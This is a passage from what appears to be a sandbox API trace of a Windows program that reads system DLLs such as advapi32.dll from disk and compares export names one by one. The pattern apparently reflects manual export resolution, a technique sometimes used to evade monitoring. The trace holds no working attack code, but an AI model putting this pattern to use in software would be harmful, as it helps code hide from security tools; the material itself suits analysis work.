GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0268.703] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0268.703] GetProcessHeap () returned 0x470000 [0268.703] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x286600) returned 0x40cc040 [0268.712] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0268.712] ReadFile (in: hFile=0x140, lpBuffer=0x40cc040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40cc040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0269.102] CloseHandle (hObject=0x140) returned 1 [0269.102] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0269.102] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0269.102] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0269.102] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.102] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0269.103] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0269.103] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.103] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0269.104] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0269.105] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0269.106] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0269.106] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.107] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0269.108] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0269.108] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.109] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0269.110] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0269.110] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0269.110] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0269.110] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0269.110] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0269.111] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0269.238] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0269.239] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0269.240] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0269.240] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0269.257] GetProcessHeap () returned 0x470000 [0269.257] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40cc040 | out: hHeap=0x470000) returned 1 [0269.270] GetProcessHeap () returned 0x470000 [0269.270] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4890a0 [0269.273] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0269.274] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0269.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0269.421] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0269.421] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0269.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0269.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 